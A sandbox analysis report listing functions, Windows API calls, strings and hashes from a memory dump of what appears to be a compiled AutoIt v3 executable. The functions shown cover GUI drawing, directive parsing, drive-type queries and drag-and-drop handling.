Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: f246c4b03aab78bcb10d60c7e91e26c9d4609fc379a77caad551d1a50f033ab9
Instruction ID: 94006f05c13670925c29393476ba94d309c80690250b6e5e8243a2a7463e3d1f
Opcode Fuzzy Hash: f246c4b03aab78bcb10d60c7e91e26c9d4609fc379a77caad551d1a50f033ab9
Instruction Fuzzy Hash: C0A19471A00615BFEB14DBA4DC4AFAF7B79EB09710F404125FA14A72E0D7B4AD05CB68

Function 0040AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0040AD1E
GetDriveTypeW.KERNEL32(?,0042FAC0,?,\\.\,0042F910), ref: 0040ADFB
SetErrorMode.KERNEL32(00000000,0042FAC0,?,\\.\,0042F910), ref: 0040AF59

Strings

ATA, xrefs: 0040AED4
SSD, xrefs: 0040AE86
iSCSI, xrefs: 0040AEFE
SCSI, xrefs: 0040AEC6
CDROM, xrefs: 0040AE2F
SATA, xrefs: 0040AF0C
RAMDisk, xrefs: 0040AE25
Removable, xrefs: 0040AE4D
Fixed, xrefs: 0040AE43
\\.\, xrefs: 0040AD70
Unknown, xrefs: 0040AE1B, 0040AEBF
1394, xrefs: 0040AEDB
Virtual, xrefs: 0040AF21
PhysicalDrive, xrefs: 0040ADA7
USB, xrefs: 0040AEF0
Network, xrefs: 0040AE39
SSA, xrefs: 0040AEE2
RAID, xrefs: 0040AEF7
MMC, xrefs: 0040AF1A
ATAPI, xrefs: 0040AECD
FileBackedVirtual, xrefs: 0040AF28
Fibre, xrefs: 0040AEE9
SAS, xrefs: 0040AF05

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: aad2fcf19183f7e7719258afb47c2edd1dc649fe08c8336bbc6775151a9212de
Instruction ID: ad10ac702d8b3b1c5df2d1f2c5fc99b13033aad5795421169ada2e81ba42f9ef
Opcode Fuzzy Hash: aad2fcf19183f7e7719258afb47c2edd1dc649fe08c8336bbc6775151a9212de
Instruction Fuzzy Hash: 015183B0644306AACB10DB10C942D7E7365EB49705B30407BF807BB2D2DE799D26D75B

Function 003A68DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 003A6931
__wcsnicmp.LIBCMT ref: 003A6949
__wcsnicmp.LIBCMT ref: 003A6961
__wcsnicmp.LIBCMT ref: 003A6979
__wcsnicmp.LIBCMT ref: 003A6991
__wcsnicmp.LIBCMT ref: 003A69A9
__wcsnicmp.LIBCMT ref: 003A69C1
__wcsnicmp.LIBCMT ref: 003A69D5
__wcsnicmp.LIBCMT ref: 003A6A16
__wcsnicmp.LIBCMT ref: 003A6A2A
__wcsnicmp.LIBCMT ref: 003A6A3E
__wcsnicmp.LIBCMT ref: 003A6A52

Strings

Cannot parse #include, xrefs: 003DE3F0
#comments-start, xrefs: 003A69BB, 003A6A10
#cs, xrefs: 003A69CF, 003A6A24
Unterminated group of comments, xrefs: 003DE403
#ce, xrefs: 003A6A4C
#include, xrefs: 003A69A3
#pragma compile, xrefs: 003A692B
#requireadmin, xrefs: 003A695B
#comments-end, xrefs: 003A6A38
#notrayicon, xrefs: 003A6943
#OnAutoItStartRegister, xrefs: 003A6973
#include-once, xrefs: 003A698B
Bad directive syntax error, xrefs: 003DE31A

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: a2621753d4d51053f4a76b2b54b771b4d49ff3e9f1980d3480fdb0e5c19d4cbb
Instruction ID: ce584d74db1323d676e7120eb382ff09440b0406dd3757cea26ba08cf3e64a2f
Opcode Fuzzy Hash: a2621753d4d51053f4a76b2b54b771b4d49ff3e9f1980d3480fdb0e5c19d4cbb
Instruction Fuzzy Hash: 2281E7B1740605AACB13BA60EC43FBF3B68EF16700F18402AF905EF196EB65DE45C665

Function 00429A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00429AD2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00429B8B
SendMessageW.USER32(?,00001102,00000002,?), ref: 00429BA7

Strings

0, xrefs: 00429BE4

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 75c2f62c58869e33149ef05309a5be72248b36caf08a8b1f5c8fd3d0433cbf2e
Instruction ID: 0d40124d4efb877e7ec1a612999eee7ad30a20f74f3c64c0123383574407016e
Opcode Fuzzy Hash: 75c2f62c58869e33149ef05309a5be72248b36caf08a8b1f5c8fd3d0433cbf2e
Instruction Fuzzy Hash: 7B02DD30204321AFD725CF14E948BABBBE4FF49314F84452EF999962A1C778DC45CB5A

Function 0042A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0042A903
SetTextColor.GDI32(?,?), ref: 0042A907
GetSysColorBrush.USER32(0000000F), ref: 0042A91D
GetSysColor.USER32(0000000F), ref: 0042A928
CreateSolidBrush.GDI32(?), ref: 0042A92D
GetSysColor.USER32(00000011), ref: 0042A945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0042A953
SelectObject.GDI32(?,00000000), ref: 0042A964
SetBkColor.GDI32(?,00000000), ref: 0042A96D
SelectObject.GDI32(?,?), ref: 0042A97A
InflateRect.USER32(?,000000FF,000000FF), ref: 0042A999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0042A9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 0042A9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0042A9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0042AA14
InflateRect.USER32(?,000000FD,000000FD), ref: 0042AA32
DrawFocusRect.USER32(?,?), ref: 0042AA3D
GetSysColor.USER32(00000011), ref: 0042AA4B
SetTextColor.GDI32(?,00000000), ref: 0042AA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0042AA67
SelectObject.GDI32(?,0042A5FA), ref: 0042AA7E
DeleteObject.GDI32(?), ref: 0042AA89
SelectObject.GDI32(?,?), ref: 0042AA8F
DeleteObject.GDI32(?), ref: 0042AA94
SetTextColor.GDI32(?,?), ref: 0042AA9A
SetBkColor.GDI32(?,?), ref: 0042AAA4

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: ab00bb87972d6fc1dceeddef552865a642119c1cf89eaef8888448522bb85749
Instruction ID: 120ce766f35334d3b8134485578f30076f99dbaa47b1adc7e07cb1a7acd5569e
Opcode Fuzzy Hash: ab00bb87972d6fc1dceeddef552865a642119c1cf89eaef8888448522bb85749
Instruction Fuzzy Hash: 0F517D71A00218FFDB109FA4DC48EAEBB79EF08320F914536F911AB2A1D7759951CB54

Function 004289D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00428AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00428AD2
CharNextW.USER32(0000014E), ref: 00428B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00428B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00428B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00428B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00428B86
SetWindowTextW.USER32(?,0000014E), ref: 00428BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00428BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 00428C1F
_memset.LIBCMT ref: 00428C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00428C8D
_memset.LIBCMT ref: 00428CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00428D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 00428D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 00428E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 00428E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00428E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00428EB4
DrawMenuBar.USER32(?), ref: 00428EC3
SetWindowTextW.USER32(?,0000014E), ref: 00428EEB

Strings

0, xrefs: 00428E55

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: bb43df7ed9d676233704c532c256bc5bd8e22d7577c6c8cb12cf7cbd48bc07e6
Instruction ID: f44a029fece04473ade8e4af6238f2a9dd01a3208a4a7795a4655f4aea4a798b
Opcode Fuzzy Hash: bb43df7ed9d676233704c532c256bc5bd8e22d7577c6c8cb12cf7cbd48bc07e6
Instruction Fuzzy Hash: BFE19170A01228ABDB209F50DC84EEF7B79EF04710F90816BF915AA290DF749985DF69

Function 0042488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 004249CA
GetDesktopWindow.USER32 ref: 004249DF
GetWindowRect.USER32(00000000), ref: 004249E6
GetWindowLongW.USER32(?,000000F0), ref: 00424A48
DestroyWindow.USER32(?), ref: 00424A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00424A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00424ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00424AE1
SendMessageW.USER32(?,00000421,?,?), ref: 00424AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00424B09
IsWindowVisible.USER32(?), ref: 00424B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00424B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00424B58
GetWindowRect.USER32(?,?), ref: 00424B70
MonitorFromPoint.USER32(?,?,00000002), ref: 00424B96
GetMonitorInfoW.USER32(00000000,?), ref: 00424BB0
CopyRect.USER32(?,?), ref: 00424BC7
SendMessageW.USER32(?,00000412,00000000), ref: 00424C32

Strings

(, xrefs: 00424BA3
tooltips_class32, xrefs: 00424A96
0, xrefs: 00424975

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: a8f9a033e5de8e5ad09ea759f9ad778dda3f425779e621e08517f0f06a4c0c94
Instruction ID: 426f378986a2a878c0004579e382c800b7bbfab830bf7b4deccfa8a79fda1b6d
Opcode Fuzzy Hash: a8f9a033e5de8e5ad09ea759f9ad778dda3f425779e621e08517f0f06a4c0c94
Instruction Fuzzy Hash: 81B18B70604350AFDB04DF64D848B5BBBE4FF89310F80892EF599AB291D775E805CB5A

Function 0040449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 004044AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004044D2
_wcscpy.LIBCMT ref: 00404500
_wcscmp.LIBCMT ref: 0040450B
_wcscat.LIBCMT ref: 00404521
_wcsstr.LIBCMT ref: 0040452C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00404548
_wcscat.LIBCMT ref: 00404591
_wcscat.LIBCMT ref: 00404598
_wcsncpy.LIBCMT ref: 004045C3

Strings

04090000, xrefs: 0040457E
\VarFileInfo\Translation, xrefs: 00404540
DefaultLangCodepage, xrefs: 004045AB
StringFileInfo\, xrefs: 0040451B
%u.%u.%u.%u, xrefs: 00404626

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 95c14ae581405ededaf3ee0e480f6c3a37e80911ef9f090c519aaa2bbf9eaf67
Instruction ID: 782a3c54ec626f27aca92219b1ec1b326a962657d3d9a3cdaf533aabf33ecce7
Opcode Fuzzy Hash: 95c14ae581405ededaf3ee0e480f6c3a37e80911ef9f090c519aaa2bbf9eaf67
Instruction Fuzzy Hash: 7C41C3726402107ADB16AA749C47FBF776C9F81710F50047EFA05EA182EA39AE0187A9

Function 003A27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003A28BC
GetSystemMetrics.USER32(00000007), ref: 003A28C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003A28EF
GetSystemMetrics.USER32(00000008), ref: 003A28F7
GetSystemMetrics.USER32(00000004), ref: 003A291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 003A2939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 003A2949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 003A297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 003A2990
GetClientRect.USER32(00000000,000000FF), ref: 003A29AE
GetStockObject.GDI32(00000011), ref: 003A29CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 003A29D5

Part of subcall function 003A2344: GetCursorPos.USER32(?), ref: 003A2357
Part of subcall function 003A2344: ScreenToClient.USER32(004657B0,?), ref: 003A2374
Part of subcall function 003A2344: GetAsyncKeyState.USER32(00000001), ref: 003A2399
Part of subcall function 003A2344: GetAsyncKeyState.USER32(00000002), ref: 003A23A7

SetTimer.USER32(00000000,00000000,00000028,003A1256), ref: 003A29FC

Strings

AutoIt v3 GUI, xrefs: 003A2974

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 8b87bf1aae4592c7b8a87886d37d11a456c0079638542dfff79c643945f483df
Instruction ID: 2140cd7df964ab970ee66377e8485aa5c73fc38f721304ae2303f77737ce89c3
Opcode Fuzzy Hash: 8b87bf1aae4592c7b8a87886d37d11a456c0079638542dfff79c643945f483df
Instruction Fuzzy Hash: ADB19E3160020AEFDB25DFA8DC45BAE7BB5FB08310F51413AFA15A7290DB74E851CB54

Function 003FA439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 003FA47A
__swprintf.LIBCMT ref: 003FA51B
_wcscmp.LIBCMT ref: 003FA52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 003FA583
_wcscmp.LIBCMT ref: 003FA5BF
GetClassNameW.USER32(?,?,00000400), ref: 003FA5F6
GetDlgCtrlID.USER32(?), ref: 003FA648
GetWindowRect.USER32(?,?), ref: 003FA67E
GetParent.USER32(?), ref: 003FA69C
ScreenToClient.USER32(00000000), ref: 003FA6A3
GetClassNameW.USER32(?,?,00000100), ref: 003FA71D
_wcscmp.LIBCMT ref: 003FA731
GetWindowTextW.USER32(?,?,00000400), ref: 003FA757
_wcscmp.LIBCMT ref: 003FA76B

Part of subcall function 003C362C: _iswctype.LIBCMT ref: 003C3634

Strings

%s%u, xrefs: 003FA515

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: c77b47fe58c23afaf673bc1b4b80b10df9952f3fb0ca3d16acd6bfb011739151
Instruction ID: 3e2cc887ff87b6183dc9142154a6e266cd604e64f3382cd886a95307d34e21b0
Opcode Fuzzy Hash: c77b47fe58c23afaf673bc1b4b80b10df9952f3fb0ca3d16acd6bfb011739151
Instruction Fuzzy Hash: 51A1A4B1204A0AABD716EF60C884FBAB7E8FF44354F008529FA9DD6150D730E959CB92

Function 003FAED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 003FAF18
_wcscmp.LIBCMT ref: 003FAF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 003FAF51
CharUpperBuffW.USER32(?,00000000), ref: 003FAF6E
_wcscmp.LIBCMT ref: 003FAF8C
_wcsstr.LIBCMT ref: 003FAF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 003FAFD5
_wcscmp.LIBCMT ref: 003FAFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 003FB00C
GetClassNameW.USER32(00000018,?,00000400), ref: 003FB055
_wcscmp.LIBCMT ref: 003FB065
GetClassNameW.USER32(00000010,?,00000400), ref: 003FB08D
GetWindowRect.USER32(00000004,?), ref: 003FB0F6

Strings

ThumbnailClass, xrefs: 003FAFE0, 003FB060
@, xrefs: 003FAEF9

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 43f9331b2f3d8520b21bf2cf7312d786db2aced4bfc55806898a322c626a5bf6
Instruction ID: 7af958381bd8db9c1ee6008b0f31df1010ec538e63027abea5310998f6f208bd
Opcode Fuzzy Hash: 43f9331b2f3d8520b21bf2cf7312d786db2aced4bfc55806898a322c626a5bf6
Instruction Fuzzy Hash: 8481A2B110830A9FDB16DF10C885FBAB7E8EF44314F14846AFE898A095DB34DD49CB61

Function 0042C5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 003A2612: GetWindowLongW.USER32(?,000000EB), ref: 003A2623

DragQueryPoint.SHELL32(?,?), ref: 0042C627

Part of subcall function 0042AB37: ClientToScreen.USER32(?,?), ref: 0042AB60
Part of subcall function 0042AB37: GetWindowRect.USER32(?,?), ref: 0042ABD6
Part of subcall function 0042AB37: PtInRect.USER32(?,?,0042C014), ref: 0042ABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 0042C690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0042C69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0042C6BE
_wcscat.LIBCMT ref: 0042C6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0042C705
SendMessageW.USER32(?,000000B0,?,?), ref: 0042C71E
SendMessageW.USER32(?,000000B1,?,?), ref: 0042C735
SendMessageW.USER32(?,000000B1,?,?), ref: 0042C757
DragFinish.SHELL32(?), ref: 0042C75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0042C851

Strings

@GUI_DROPID, xrefs: 0042C77E
@GUI_DRAGID, xrefs: 0042C7C9
@GUI_DRAGFILE, xrefs: 0042C800
pbF, xrefs: 0042C79B

Memory Dump Source

Source File: 00000000.00000002.2054319229.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.2054234847.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054369657.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054559221.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2054686327.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_n0nsAzvYNd.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbF
API String ID: 169749273-110409404
Opcode ID: 13790ef579b51db72ec535c515f3397794d404e0c05b18da78c1985b0ca60949
Instruction ID: 8bad8dc5d81e277fe8998bbfd969ef8859edeb9baa9d8d0886721a424503af79
Opcode Fuzzy Hash: 13790ef579b51db72ec535c515f3397794d404e0c05b18da78c1985b0ca60949
Instruction Fuzzy Hash: BC618C71208300AFC711EF64DC85EAFBBF8EF89310F80092EF595961A1DB749A49CB56

Function 003FABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 003FAC33

Strings

REGEXP=, xrefs: 003FAC48
LAST, xrefs: 003FABF8
[REGEXPTITLE:, xrefs: 003FAC5B
[ACTIVE, xrefs: 003FAC20
[LAST, xrefs: 003FACE0
